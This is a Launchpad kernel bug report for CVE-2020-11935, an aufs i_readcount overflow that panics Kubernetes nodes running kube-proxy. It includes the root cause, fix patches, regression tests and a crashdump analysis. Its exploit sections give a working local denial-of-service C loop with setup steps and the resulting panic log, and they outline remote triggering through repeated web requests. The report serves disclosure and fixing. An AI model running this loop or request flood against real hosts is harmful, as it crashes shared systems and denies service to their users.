kernel panic hit by kube-proxy iptables-save/restore caused by aufs

Bug #1873074 reported by Mauricio Faria de Oliveira on 2020-04-15

This bug affects 1 person

Affects	Status	Importance	Assigned to
linux (Ubuntu)	Fix Released	Medium	Mauricio Faria de Oliveira
Xenial	Fix Released	Medium	Mauricio Faria de Oliveira
Bionic	Fix Released	Medium	Mauricio Faria de Oliveira
Eoan	Won't Fix	Medium	Mauricio Faria de Oliveira
Focal	Fix Released	Medium	Mauricio Faria de Oliveira
Groovy	Won't Fix	Medium	Mauricio Faria de Oliveira

Bug Description

[Impact]

* Systems with aufs mounts are vulnerable to a kernel BUG(),
which can turn into a panic/crash if panic_on_oops is set.

* It is exploitable by unprivileged local users, and potentially
through remote access operations (e.g., requests to a web server).

* This issue has also manifested in Kubernetes deployments
with a kernel panic in iptables-save or iptables-restore
after a few weeks of uptime, without user interaction.

* Usually all Kubernetes worker nodes hit the issue around
the same time.

[Fix]

* The issue is fixed with 2 patches in aufs4-linux.git:
- 515a586eeef3 aufs: do not call i_readcount_inc()
- f10aea57d39d aufs: bugfix, IMA i_readcount

* The first addresses the issue, and the second addresses a
regression in the aufs feature to change RW branches to RO.

* The kernel v5.3 aufs patches had an equivalent fix to the
second patch, which is present in the Focal aufs patchset
(and on ubuntu-unstable/master & /master-5.8 on 20200629)

- 1d26f910c53f aufs: for v5.3-rc1, maintain i_readcount
(in aufs5-linux.git)

[Test Case]

* Repeatedly open/close the same file in read-only mode in
aufs (UINT_MAX times, to overflow a signed int back to 0.)

* Alternatively, monitor the underlying filesystem's file
inode.i_readcount over several open/close system calls.
(should not monotonically increase; rather, return to 0.)

[Regression Potential]

* This changes the core path through which aufs opens files, so
   there is a risk of regression; however, the fix makes aufs behave
   the way other filesystems do, so this generally is OK to do.
   In any case, most regressions would manifest in open() or
   close() (where the VFS handles/checks inode.i_readcount.)

* The aufs maintainer has access to an internal test-suite
   used to validate aufs changes, used to identify the first
   regression (in the branch RW/RO mode change), and then to
   validate/publish the patches upstream; should be good now.

* This has also been tested with 'stress-ng --class filesystem'
   and with 'xfstests -overlay' (patch to use aufs vs overlayfs)
   on Xenial/Bionic/Focal (-proposed vs. -proposed + patches).
   No regressions observed in stress-ng/xfstests log or dmesg.

[Other Info]

* Applied on Unstable (branches master and master-5.8)
* Not required on Groovy (still 5.4; should sync from Unstable)
* Required on LTS releases: Bionic and Focal and Xenial.
* Required on other releases: Disco and Eoan (for custom kernels)

[Original Bug Description]

Problem Report:
--------------

A user reported that several nodes in their Kubernetes clusters
hit a kernel panic at about the same time, and periodically
(usually at 35 days of uptime, and in the same order the nodes
booted.)

The kernel panic messages/stack traces are consistent across
nodes, in __fput() by iptables-save/restore from kube-proxy.

Example:

"""
[3016161.866702] kernel BUG at .../include/linux/fs.h:2583!
[3016161.866704] invalid opcode: 0000 [#1] SMP
...
[3016161.866780] CPU: 40 PID: 33068 Comm: iptables-restor Tainted: P OE 4.4.0-133-generic #159-Ubuntu
...
[3016161.866786] RIP: 0010:[...] [...] __fput+0x223/0x230
...
[3016161.866818] Call Trace:
[3016161.866823] [...] ____fput+0xe/0x10
[3016161.866827] [...] task_work_run+0x86/0xb0
[3016161.866831] [...] exit_to_usermode_loop+0xc2/0xd0
[3016161.866833] [...] syscall_return_slowpath+0x4e/0x60
[3016161.866839] [...] int_ret_from_sys_call+0x25/0x9f
"""

(uptime: 3016161 seconds / (24*60*60) = 34.90 days)

They have provided a crashdump (privately available) used
for analysis later in this bug report.

Note: the root cause turns out to be independent of K8s,
as explained in the Root Cause section.

Related Report:
--------------

This behavior matches this public bug of another user:
https://github.com/kubernetes/kubernetes/issues/70229

"""
I have several machines happen kernel panic，and these
machine have same dump trace like below:

KERNEL: /usr/lib/debug/boot/vmlinux-4.4.0-104-generic
...
PANIC: "kernel BUG at .../include/linux/fs.h:2582!"
...
COMMAND: "iptables-restor"
...
crash> bt
...
[exception RIP: __fput+541]
...
#8 [ffff880199f33e60] __fput at ffffffff812125ac
#9 [ffff880199f33ea8] ____fput at ffffffff812126ee
#10 [ffff880199f33eb8] task_work_run at ffffffff8109f101
#11 [ffff880199f33ef8] exit_to_usermode_loop at ffffffff81003242
#12 [ffff880199f33f30] syscall_return_slowpath at ffffffff81003c6e
#13 [ffff880199f33f50] int_ret_from_sys_call at ffffffff818449d0
...

The above showed command "iptables-restor" cause the kernel
panic and its pid is 16884，its parent process is kube-proxy.

Sometimes the process of kernel panic is "iptables-save" and
the dump trace are same.

The kernel panic always happens every 26 days(machine uptime)
"""

<< Adding further sections as comments to keep page short. >>

CVE References

2020-11935

Revision history for this message

Mauricio Faria de Oliveira (mfo) wrote on 2020-04-15:

Security Impact:
---

The root cause of this problem can be easily exploited
by unprivileged users, both local and remote attackers.

It only needs access to an aufs mount point with read
permissions to any file; opening it in read-only mode,
repeatedly.

For that reason, sending the patch for this, even if the
wording is kept low profile and boring, may reveal enough
information to exploit the problem, so it probably needs
some care and coordination.

Details in 'Exploit / Local' (and Remote) sections.

Mauricio Faria de Oliveira (mfo) wrote on 2020-04-15:

Security Impact Surface:
---

For Kubernetes itself, this is less likely nowadays with
the move from aufs to overlayfs in Docker (which used to
be the biggest driver for aufs AFAIK), and additionally,
newer versions have kube-proxy call iptables-save/restore
less often.

The versions typically used in the Xenial timeframe (and
which may still be around) still have both (aufs default,
and kube-proxy calling iptables-save more frequently.)

Detailed version numbers for Docker/Kubernetes for that
information can be provided if needed.

...

For the root cause (i.e., independently of Kubernetes),

This affects any distribution which ships aufs filesystem
AND enables CONFIG_IMA (sufficient until the 5.3 kernel)
OR enables CONFIG_FILE_LOCKING (new with the 5.3 kernel);

(either CONFIG option enables i_readcount/that BUG_ON())

Ubuntu:
--

This is true for all supported Ubuntu releases (T/X/B/E/F),
which ship aufs in the kernel packages as a kernel module.

Debian:
--

This affects Debian too, which ships aufs-dkms to build it.

This is true for Debian Stretch (oldstable) with 4.9 kernel.

This is not, for Debian Buster (stable) with the 4.19 kernel
(as CONFIG_IMA was disabled on 4.16 in Debian, g82596c5122fe)

BUT buster-backports has 5.4 kernel; so if aufs-dkms goes on
to support it, the problem would be exposed on Debian Buster.

This is true for Debian Bullseye (testing), again pending
support from aufs-dkms, which is currently locked to the 5.2
kernel via this DKMS directive (BUILD_EXCLUSIVE_KERNEL="^5.2.*").

Other Distros:
--

Apparently official support for aufs is uncommon on other
distros, as it's not in the upstream/mainline Linux, but
there are distro-community efforts that provide it.
- Arch Linux User Repository/AUR
- CentOS community/custom packages on top of
kernel-lt (longterm) and kernel-ml (mainline) stable pkgs.

Those were not checked.

Mauricio Faria de Oliveira (mfo) wrote on 2020-04-15:

Root Cause:
----------

Note: this is completely independent of Kubernetes.

The aufs filesystem calls i_readcount_inc() when opening a
file in read-only mode, not paired with an i_readcount_dec().

@ fs/aufs/vfsub.c

struct file *vfsub_dentry_open(struct path *path, int flags)
{
    struct file *file;

    file = dentry_open(path, flags /* | __FMODE_NONOTIFY */,
                       current_cred());
    if (!IS_ERR_OR_NULL(file)
        && (file->f_mode & (FMODE_READ | FMODE_WRITE)) == FMODE_READ)
            i_readcount_inc(d_inode(path->dentry));

    return file;
}

That is _incorrect_ as only the VFS layer should maintain
the 'struct inode.i_readcount' value.

Neither i_readcount_inc() nor i_readcount_dec() should be
called there. They are not used outside the VFS in the Linux
tree.

So,

If the same file is opened in read-only mode enough times,
its backing inode.i_readcount value overflows back to zero.

Once that happens, when the file is closed, __fput() calls
i_readcount_dec(), and that will trigger the BUG_ON().

That causes a kernel panic/crash if panic_on_oops is set;
otherwise, just kernel messages.

By default it's not, but usually the 'enterprise'/larger
users set it so to save kernel crashdumps on such errors.

See the 'Problem Demonstration / Instrumentation' section
to watch the number to overflow and hit the BUG_ON/panic.

Mauricio Faria de Oliveira (mfo) wrote on 2020-04-15:

Workaround:
---

Clean the inode cache, which should remove the inode from
memory, and when it's needed again, it's initialized with
i_readcount zero.

$ echo 2 | sudo tee /proc/sys/vm/drop_caches

This may happen indirectly from time to time on systems,
as part of normal memory cleansing/reclaiming, and thus
the problem might be avoided or never noticed.

This might impact performance, as the inode and dentry
caches are flushed.

Mauricio Faria de Oliveira (mfo) wrote on 2020-04-15:

Fix:
---

Patch attached ("aufs-do-not-call-i_readcount_inc.patch").

This applies to Ubuntu kernels, aufs upstream, and other
distros' aufs (e.g. Debian aufs-dkms package.)

Attached analysis of the aufs change back in Linux v2.6.39
that introduced the problem ("aufs-intro-i_readcount_inc"),
explaining what happened and why that change is incorrect.

Mauricio Faria de Oliveira (mfo) wrote on 2020-04-15:

aufs-do-not-call-i_readcount_inc.patch (4.0 KiB, text/plain)

Mauricio Faria de Oliveira (mfo) wrote on 2020-04-15:

Regression Testing:
---

The fix ran through regression testing with three tools.

No regressions observed between original/patched 5.4.0-21.
- 5.4.0-21-generic #25-Ubuntu SMP Sat Mar 28 13:10:28 UTC 2020
- 5.4.0-21-generic #25+aufs SMP Fri Apr 3 12:09:29 -03 2020

1) stress-ng (on host, and on kube-proxy's aufs mount)

Command: stress-ng --class filesystem --sequential 0 --timeout 5m
(takes about 3 hours to finish.)

The stress-ng logs were normalized for PID/process number
and unique messages then compared. There are no unexpected
new error messages. Also compared the dmesg output.

The runs on the kube-proxy's aufs mountpoint consisted
of finding which /var/lib/docker/aufs/mnt/ directory
is used by kube-proxy (which triggered the problem)
and running stress-ng over there.

2) xfstests-dev, patched to use aufs instead of overlayfs

The xfstests-dev patch is attached ("xfstests-aufs.patch").
It's not yet upstream -- working on v2 for upstream which
also covers fuse-overlayfs.

The set of test failures is identical for original/patched
kernels, seen as one single unique line across the 2 logs:

$ grep -h '^Failures:' xfstests.{orig,patch}.log | sort -u | wc -l
1

And the number of failures is, of course, identical:

"Failed 357 of 648 tests."

Command: "./check -overlay -E /tmp/exclude-tests" with
10 tests excluded, which hang the kernel or block tasks.
(steps/details available in the patch message.)

3) smoke test for aufs (from the kernel team)

The smoke test for aufs from the kernel team is located at:
https://kernel.ubuntu.com/git/ubuntu/autotest-client-tests.git/tree/ubuntu_aufs_smoke_test/ubuntu_aufs_smoke_test.sh

Its output is identical on original/patched kernel.

Mauricio Faria de Oliveira (mfo) wrote on 2020-04-15:

Exploit / Local:
---

The local exploit is trivial as 'mount | grep aufs' says
whether there's an aufs mountpoint, and usually there is
a file that is 'chmod o+r' that any user could read/open.

(This crashed a virtual machine in 8 hours, overnight.)
See section 'Exploit / Local' below.

Code:

    $ cat <<EOF >exploit.c
    #include <fcntl.h>
    #include <unistd.h>
    int main() { while (!close(open("test", O_RDONLY))); return 0; }
    EOF

    $ gcc -o /tmp/exploit exploit.c

Setup:

    $ mkdir dir mnt
    $ touch dir/test
    $ sudo mount -t aufs -o br=dir none mnt

    $ ls mnt
    test

Run:

    $ cd mnt && /tmp/exploit
    <just let it run until..>

    [29167.866016] kernel BUG at include/linux/fs.h:2963!
    [29167.867423] invalid opcode: 0000 [#1] SMP PTI
    [29167.868584] CPU: 0 PID: 5314 Comm: exploit Tainted: G OE 5.4.0-21-generic #25-Ubuntu
    [29167.870751] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014
    [29167.873202] RIP: 0010:__fput+0x25d/0x260
    ...
    [29167.901583] Call Trace:
    [29167.902387] ____fput+0xe/0x10
    [29167.903344] task_work_run+0x8f/0xb0
    [29167.904420] exit_to_usermode_loop+0x131/0x160
    [29167.905749] do_syscall_64+0x163/0x190
    [29167.906929] entry_SYSCALL_64_after_hwframe+0x44/0xa9
    ...
    [29167.967808] Kernel panic - not syncing: Fatal exception

(uptime = 29167 seconds / 3600 seconds/hour = 8.10 hours)

Mauricio Faria de Oliveira (mfo) wrote on 2020-04-15:

Exploit / Remote:
---

The remote exploit is possible if such file is opened in
response to an event, for example, a web server document
stored in an aufs mountpoint.

This obviously takes more time - each i_readcount_inc() is
delayed by a remote access - but it may be sped up by many
attackers, say a DDoS, if it's possible to figure or brute
force which URLs lead to an aufs-backed file in the server.

(This can happen with Kubernetes/docker containers using
the aufs storage driver for container images for example,
with static document in the container image, and exposed
via a web server, say nginx, a very popular docker image.)

See the 'Problem Demonstration' section w/ this example.

Mauricio Faria de Oliveira (mfo) wrote on 2020-04-15:

#10

Problem Demonstration / Instrumentation:
---------------------------------------

This kprobe kernel module ("kmod-kprobe-fput.c") inserts a
probe on __fput(), and prints the i_readcount value before
decrementing it, when a specified filename is found.
(usage/steps on header comments.)

$ sudo insmod kmod-kprobe-fput.ko 
    [  315.625113] kmod_kprobe_fput: kprobe registered (filename: test, multiple: 0)

The i_readcount value is only incremented on reads, not writes:

$ touch test
    [  308.193058] file: test, fs type: ext4, inode readcount: 0

$ > test
    [  310.293847] file: test, fs type: ext4, inode readcount: 0

$ cat test
    [  312.667149] file: test, fs type: ext4, inode readcount: 1

$ cat test
    [  317.312413] file: test, fs type: ext4, inode readcount: 1

$ cat test
    [  319.223841] file: test, fs type: ext4, inode readcount: 1

It is decremented only when the file is closed:

    $ tail -f test &
    $ tail -f test &
    $ tail -f test &

$ cat test
    [  365.042632] file: test, fs type: ext4, inode readcount: 4

$ kill %%
    [  372.241224] file: test, fs type: ext4, inode readcount: 3

$ kill %%
    [  376.151455] file: test, fs type: ext4, inode readcount: 2

$ kill %%
    [  378.802151] file: test, fs type: ext4, inode readcount: 1

With aufs, there are 2 files/inodes, one in the virtual/aufs
filesystem, another in the (underlying) real/ext4 filesystem.
Then aufs handles/redirects the open/read/write calls to it.

    $ mkdir dir mnt
    $ touch dir/test
    $ sudo mount -t aufs -o br=dir none mnt

$ ls mnt
    test

The problem is observable upfront: i_readcount for the real
inode/filesystem gets an extra increment on each read-only open.

$ cat mnt/test
    [  453.819165] file: test, fs type: aufs, inode readcount: 1
    [  453.819226] file: test, fs type: ext4, inode readcount: 2

$ cat mnt/test
    [  458.091550] file: test, fs type: aufs, inode readcount: 1
    [  458.091599] file: test, fs type: ext4, inode readcount: 3

$ cat mnt/test
    [  463.165711] file: test, fs type: aufs, inode readcount: 1
    [  463.165759] file: test, fs type: ext4, inode readcount: 4

Compare that with the non-aufs/ext4-only output above for
multiple cats ;-) - the inode's i_readcount on ext4 grows.

...

That kprobe was enabled during the 'Exploit / Local' run.

The logs show the i_readcount value incrementing until it
overflowed, when the BUG_ON()/panic happened, and crashed.

(The 'multiple' parameter only prints when i_readcount is
a multiple of its value, in unsigned type.)

$ sudo insmod kmod-kprobe-fput.ko multiple=100000
    [ 1684.953480] kmod_kprobe_fput: kprobe registered (filename: test, multiple: 100000)

$ cd mnt && /tmp/exploit
    [ 1799.795277] file: test, fs type: ext4, inode readcount: 100000
    [ 1800.420418] file: test, fs type: ext4, inode readcount: 200000
    [ 1801.030687] file: test, fs type: ext4, inode readcount: 300000
    ...
    [ 2428.610831] file: test, fs type: ext4, inode readcount: 100000000
    ...
    [ 7909.385033] file: test, fs type: ext4, inode readcount: 1000000000
    ...
    [14191.533372] file: test, fs type: ext4, inode readcount: 2000000000
    ...
    [15156.688678] file: test, fs type: ext4, inode readcount: 2147400000
    [15157.432852] file: test, fs type: ext4, inode readcount: -2147451616
    ...
    [16123.045186] file: test, fs type: ext4, inode readcount: -2000051616
    ...
    [22655.214420] file: test, fs type: ext4, inode readcount: -1000051616
    ...
    [28517.303066] file: test, fs type: ext4, inode readcount: -100051616
    ...
    [29161.058111] file: test, fs type: ext4, inode readcount: -1051616
    [29161.702771] file: test, fs type: ext4, inode readcount: -951616
    [29162.337571] file: test, fs type: ext4, inode readcount: -851616
    [29162.980385] file: test, fs type: ext4, inode readcount: -751616
    [29163.614763] file: test, fs type: ext4, inode readcount: -651616
    [29164.253970] file: test, fs type: ext4, inode readcount: -551616
    [29164.890793] file: test, fs type: ext4, inode readcount: -451616
    [29165.566457] file: test, fs type: ext4, inode readcount: -351616
    [29166.224213] file: test, fs type: ext4, inode readcount: -251616
    [29166.879175] file: test, fs type: ext4, inode readcount: -151616
    [29167.528966] file: test, fs type: ext4, inode readcount: -51616
    [29167.862871] file: test, fs type: ext4, inode readcount: 0
    [29167.864633] ------------[ cut here ]------------
    [29167.866016] kernel BUG at include/linux/fs.h:2963!
    [29167.867423] invalid opcode: 0000 [#1] SMP PTI
    [29167.868584] CPU: 0 PID: 5314 Comm: exploit Tainted: G           OE     5.4.0-21-generic #25-Ubuntu
    [29167.870751] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014
    [29167.873202] RIP: 0010:__fput+0x25d/0x260
    ...
    [29167.901583] Call Trace:
    [29167.902387]  ____fput+0xe/0x10
    [29167.903344]  task_work_run+0x8f/0xb0
    [29167.904420]  exit_to_usermode_loop+0x131/0x160
    [29167.905749]  do_syscall_64+0x163/0x190
    [29167.906929]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
    ...
    [29167.967808] Kernel panic - not syncing: Fatal exception

Example of Web Server / nginx with Kubernetes
--

The same i_readcount increments are observed for the
'index.html' page served by nginx, as that is stored
in the container image, thus accessed via aufs.

(After deploying Kubernetes/Docker with aufs storage driver)

Start nginx pod/container:

$ kubectl run web-server --image=nginx

Get its IP address:

$ kubectl get pods -o wide
    NAME         READY   STATUS    RESTARTS   AGE   IP          NODE             NOMINATED NODE   READINESS GATES
    web-server   1/1     Running   0          48s   10.10.0.4   sf244755-focal   <none>           <none>

Test it:

$ curl -s 10.10.0.4 | grep title
    <title>Welcome to nginx!</title>

$ sudo insmod kmod-kprobe-fput.ko filename=index.html
    [ 3735.601633] kmod_kprobe_fput: kprobe registered (filename: index.html, multiple: 0)

$ curl -s 10.10.0.4 >/dev/null
    [ 3757.368671] file: index.html, fs type: aufs, inode readcount: 1
    [ 3757.381055] file: index.html, fs type: ext4, inode readcount: 7

$ curl -s 10.10.0.4 >/dev/null
    [ 3767.402218] file: index.html, fs type: aufs, inode readcount: 1
    [ 3767.407846] file: index.html, fs type: ext4, inode readcount: 8

$ curl -s 10.10.0.4 >/dev/null
    [ 3771.856605] file: index.html, fs type: aufs, inode readcount: 1
    [ 3771.866484] file: index.html, fs type: ext4, inode readcount: 9

And the web server can be exposed/made available externally,
for example:

$ kubectl expose pod web-server --port 80 --type NodePort

$ kubectl get services web-server
    NAME         TYPE       CLUSTER-IP    EXTERNAL-IP   PORT(S)        AGE
    web-server   NodePort   10.100.0.69   <none>        80:32089/TCP   6s

another-host$ curl -s 192.168.122.151:32089 | grep title
    <title>Welcome to nginx!</title>

    [ 4037.893050] file: index.html, fs type: aufs, inode readcount: 1
    [ 4037.909541] file: index.html, fs type: ext4, inode readcount: 10

Mauricio Faria de Oliveira (mfo) wrote on 2020-04-15:

#11

kmod-kprobe-fput.c (2.2 KiB, text/x-csrc)

Mauricio Faria de Oliveira (mfo) wrote on 2020-04-15:

#12

Crashdump Analysis:
------------------

Part 1) Where

The BUG_ON() in fs.h:2583 originates from i_readcount_dec().

This function decrements the struct inode.i_readcount field,
but first it checks if that got to zero before decrementing
(which indeed indicates a bug with the i_readcount balance.)

    2580 #ifdef CONFIG_IMA
    2581 static inline void i_readcount_dec(struct inode *inode)
    2582 {
    2583         BUG_ON(!atomic_read(&inode->i_readcount));
    2584         atomic_dec(&inode->i_readcount);
    2585 }

So, that happened: i_readcount_dec() found i_readcount to be
zero, which is not expected, and triggered the BUG_ON() call.

This is indeed called from __fput():

    187 static void __fput(struct file *file)
    ...
    217         if ((file->f_mode & (FMODE_READ | FMODE_WRITE)) == FMODE_READ)
    218                 i_readcount_dec(inode);

From the crashdump, we can confirm that i_readcount (value
in the EAX register) is indeed zero, and that jumps to ud2
(the undefined/invalid opcode in BUG()) at offset 0x223 = 547.

    crash> disass -x __fput
    ...
       0xffffffff81218ad2 <+418>: mov 0x154(%r13),%eax
       0xffffffff81218ad9 <+425>: test %eax,%eax
       0xffffffff81218adb <+427>: je 0xffffffff81218b53 <__fput+547>
    ...
       0xffffffff81218b53 <+547>: ud2

    crash> bt
    ...
        [exception RIP: __fput+547]
    ...
        RAX: 0000000000000000 RBX: ffff882a32191c00 RCX: 000000001b1a76dc
    ...

Part 2) What

Looking at which 'struct file' triggered this problem,
we have 'struct inode.i_readcount' at R13 + 0x154, so
inode is at R13 since i_readcount offset is 0x154.

    crash> struct -x -o inode.i_readcount
    struct inode {
      [0x154] atomic_t i_readcount;
    }

    crash> bt
    ...
        R13: ffff883f2ad40e90 R14: ffff887f6368d0a0 R15: ffff883f2ad0d200
    ...

So, inode = ffff883f2ad40e90

Checking the assembly for 'struct file', it's kept at RBX (above.)

So, file = ffff882a32191c00

And the inode pointer in file does match the value we have, good.

    crash> struct -x file.f_inode ffff882a32191c00
      f_inode = 0xffff883f2ad40e90

Now, walking up the file's dentry chain, we get the path:

    crash> struct -x file.f_path.dentry ffff882a32191c00
      f_path.dentry = 0xffff883f2ad0d200

    crash> struct -x dentry.d_name.name,d_parent 0xffff883f2ad0d200
      d_name.name = 0xffff883f2ad0d238 "protocols"
      d_parent = 0xffff883f42a33080

    crash> struct -x dentry.d_name.name,d_parent 0xffff883f42a33080
      d_name.name = 0xffff883f42a330b8 "etc"
      d_parent = 0xffff883f5d747b00

    crash> struct -x dentry.d_name.name,d_parent 0xffff883f5d747b00
      d_name.name = 0xffff883f4e892b50 "7e8d17d0d767bad43bbab4953b457660e2ad9d61162efd00261db0b36c1f7558"
      d_parent = 0xffff883f619cc480

    crash> struct -x dentry.d_name.name,d_parent 0xffff883f619cc480
      d_name.name = 0xffff883f619cc4b8 "diff"
      d_parent = 0xffff883f619ccc00

    crash> struct -x dentry.d_name.name,d_parent 0xffff883f619ccc00
      d_name.name = 0xffff883f619ccc38 "aufs"
      d_parent = 0xffff883f61930780

crash> struct -x dentry.d_name.name,d_parent 0xffff883f61930780
      d_name.name = 0xffff883f619307b8 "docker"
      d_parent = 0xffff887f5e8b9bc0

crash> struct -x dentry.d_name.name,d_parent 0xffff887f5e8b9bc0
      d_name.name = 0xffff887f5e8b9bf8 "/"
      d_parent = 0xffff887f5e8b9bc0

And that file/path is on top of this mount point:

crash> struct -x file.f_path.mnt ffff882a32191c00
      f_path.mnt = 0xffff887f6368d0a0,

crash> struct -x vfsmount.mnt_sb 0xffff887f6368d0a0
      mnt_sb = 0xffff887f63a7c000

crash> mount | grep ffff887f63a7c000
    ffff887f6368d080 ffff887f63a7c000 xfs    /dev/nvme0n1 /opt/k8s

So the full path to the file is:

/opt/k8s/docker/aufs/diff/7e8d17d0d767bad43bbab4953b457660e2ad9d61162efd00261db0b36c1f7558/etc/protocols

And indeed, iptables-save/restore use the /etc/protocols file
to check for protocol/port numbers used by the iptables rules
(code from iptables package version 1.6.0-2ubuntu3 on Ubuntu.)

@ iptables/iptables-save.c
    iptables_save_main() -> do_output() -> print_rule4() -> print_proto() -> getprotobynumber() -> /etc/protocols

@ iptables/iptables-restore.c
    iptables_restore_main() -> do_command4() / case 'p' -> xtables_parse_protocol() -> getprotobyname() -> /etc/protocols

Important:

Interestingly the problem happened with the real file on disk
rather than with the virtual file in the aufs mount point for
the container kube-proxy (and iptables-save/restore) run from.

This user had another crashdump on Ubuntu Yakkety 4.8 kernel,
with same file (/opt/k8s/docker/aufs/diff/.../etc/protocols).

Part 3) Why

Long story short.

After exploring the possible paths that update i_readcount,
and failing to find any theory or actual problem which may
have caused it to become unbalanced negatively (additional
decrements or less increments) finally this not so obvious
"opposite" seemed to be the problem:

i_readcount becomes unbalanced _positively_ (e.g., due to
additional increments), until it overflows the 32-bit integer
limit (the atomic type) and wraps back to zero.

And, sure enough, aufs has an (unpaired) i_readcount_inc().

Also, it affects the inode of the real file on disk, not
of the virtual file in aufs, which matches our crashdump.
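
A toy model of the wrap, as a rough sketch only. It assumes each
read-only open does one VFS increment plus one unpaired aufs
increment, each close does one decrement, and the BUG fires when
the decrement finds the counter at zero. The counter width is a
parameter so the loop finishes quickly; masking treats the counter
as unsigned, which does not change where zero is reached.

```python
def cycles_until_bug(bits=32, extra_inc=1, max_cycles=1_000_000):
    """Return the open/close cycle whose close would find the counter
    at zero, or None if that does not happen within max_cycles."""
    mask = (1 << bits) - 1
    count = 0
    for cycle in range(1, max_cycles + 1):
        count = (count + 1) & mask          # VFS: read-only open
        count = (count + extra_inc) & mask  # assumed unpaired increment
        if count == 0:
            return cycle                    # close would hit the zero check
        count = (count - 1) & mask          # VFS: close
    return None


print(cycles_until_bug(bits=8))               # narrow counter, unbalanced
print(cycles_until_bug(bits=8, extra_inc=0))  # balanced: never trips
```

Under these assumptions an N-bit counter trips on cycle 2^N - 1,
which for 32 bits would be UINT_MAX open/close cycles.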

...

This seemed unlikely but does make sense/explain the long
time to reproduce the problem (25-35 days) for both users.

And it also does make sense/explain several systems doing
similar things then crashing around similar times.

(on this particular user/example, the kube-proxy calls to
iptables-save/restore happen as a response to kubernetes
services changes and on a periodic basis too, thus since
the systems are big, probably running many services, and
changing services/network rules often, the rate of calls
may have become high enough to trigger it over the weeks.)
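
As a back-of-the-envelope check, the sustained rate needed to wrap
a 32-bit counter in 25-35 days can be estimated as below. This
assumes every open/close of the file leaves a net +1 on the
counter and that the rate is constant, neither of which is
verified here.

```python
SECONDS_PER_DAY = 86_400
WRAP = 2 ** 32  # net increments needed to wrap a 32-bit counter


def opens_per_second(days):
    """Average open/close rate that would wrap the counter in 'days'."""
    return WRAP / (days * SECONDS_PER_DAY)


for days in (25, 35):
    print(days, "days:", round(opens_per_second(days)), "opens/sec")
```

That is on the order of 1,400 to 2,000 opens of /etc/protocols per
second on average, which is plausible only if the file is opened
once per rule rather than once per iptables-save/restore call.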

...

Part 4) Really?

In order to confirm it, looking at the crashdump, there
are several inodes in the underlying/backing filesystem;
indeed with very unbalanced/large values in i_readcount.

Looking at the inodes list of the superblock mentioned,
let's list the top 20 values for i_readcount.

crash> mount | grep ffff887f63a7c000
    ffff887f6368d080 ffff887f63a7c000 xfs    /dev/nvme0n1 /opt/k8s

crash> struct -o super_block.s_inodes ffff887f63a7c000
    struct super_block {
      [ffff887f63a7c608] struct list_head s_inodes;
    }

crash> list -S inode.i_readcount.counter -l inode.i_sb_list -H ffff887f63a7c608 | grep i_readcount.counter | sort -rn -k3,3 | head -n20
      i_readcount.counter = 755438589
      i_readcount.counter = 14799006
      i_readcount.counter = 11247257
      i_readcount.counter = 11247257
      i_readcount.counter = 11247242
      i_readcount.counter = 11247242
      i_readcount.counter = 11247242
      i_readcount.counter = 11247242
      i_readcount.counter = 11247242
      i_readcount.counter = 11247242
      i_readcount.counter = 6511562
      i_readcount.counter = 5327637
      i_readcount.counter = 3551757
      i_readcount.counter = 1812946
      i_readcount.counter = 1775876
      i_readcount.counter = 1775876
      i_readcount.counter = 1775876
      i_readcount.counter = 1775875
      i_readcount.counter = 1775871
      i_readcount.counter = 1408817
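
The same sort/head step can be done outside crash on a saved
copy of the list output. A minimal sketch, assuming the output
keeps the "i_readcount.counter = N" line format shown above; the
sample is a hand-picked, shuffled subset of the values listed,
and the helper names are made up.

```python
from collections import Counter

SAMPLE = """\
  i_readcount.counter = 11247242
  i_readcount.counter = 755438589
  i_readcount.counter = 1775876
  i_readcount.counter = 11247257
  i_readcount.counter = 14799006
  i_readcount.counter = 11247257
  i_readcount.counter = 11247242
"""


def readcounts(crash_output):
    """Extract the integer from every 'i_readcount.counter = N' line."""
    values = []
    for line in crash_output.splitlines():
        fields = line.split()
        if len(fields) == 3 and fields[:2] == ["i_readcount.counter", "="]:
            values.append(int(fields[2]))
    return values


def top(values, n=20):
    return sorted(values, reverse=True)[:n]


def repeated(values):
    """Values seen on more than one inode (files likely opened together)."""
    return {v: c for v, c in Counter(values).items() if c > 1}


vals = readcounts(SAMPLE)
print(top(vals, 3))
print(repeated(vals))
```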

Part 5) Really from aufs?

It's interesting to examine other aufs files used by the
kube-proxy container when running iptables-save/restore (as
they are opened as well, thus should also show the symptom.)

Obviously, /etc/protocols is accessed more often, as it's
the file whose i_readcount increased so much that it
overflowed back to zero and triggered the crash.
(It is opened on a "per-iptables rule with port number" basis.)
But for the same reason, its value is not 'large' anymore.

So, let's look at another file used by iptables-save/restore
(and other programs), say the standard C library, libc.so,
which is thus expected to have a large i_readcount.

Part 5.1) crash scripting

The hash in the file path is an aufs branch/layer identifier,
which is referred to by the aufs superblock info structure:

/opt/k8s/docker/aufs/diff/7e8d17d0d767bad43bbab4953b457660e2ad9d61162efd00261db0b36c1f7558/etc/protocols

Now there is some crash scripting to navigate through the
aufs structures/specific fields while keeping pointers as
reference for their info, so that we can backtrack to use
the structures that lead us to a particular value later.

We want to find the aufs superblock with that branch hash.

Notes:

- struct super_block.s_fs_info (pointer to struct au_sbinfo)
- struct au_sbinfo.si_branch (array of pointers to struct au_branch, with si_bend elements)
- struct au_branch.br_path.dentry (pointer to dentry of that branch/layer in disk)
- struct dentry.d_name.name (string with the dentry's basename in disk)

Idea:

crash> < list-of-commands | tee list-of-commands-output | shell glue to generate more commands > list-of-commands.next

Therefore:

0) Load debuginfo for aufs kernel module:

crash> mod -s aufs /usr/lib/debug/lib/modules/4.4.0-133-generic/kernel/fs/aufs/aufs.ko

1) For each aufs superblock, output commands to print its super_block.s_fs_info (i.e., au_sbinfo pointer)

crash> mount | awk '/aufs/ { print "struct super_block.s_fs_info", $2 }' > crash.struct-sb-s_fs_info.script

2) For each au_sbinfo, output commands to print its si_bend (number of branches) and si_branch array pointer

crash> < crash.struct-sb-s_fs_info.script | tee crash.struct-sb-s_fs_info.output | awk '/s_fs_info =/ { print "struct au_sbinfo.si_bend,si_branch", $3 }' > crash.struct-au_sbinfo_bend_branch.script

3) For each si_branch array pointer, output commands to read its si_bend elements (i.e., si_branch pointers)

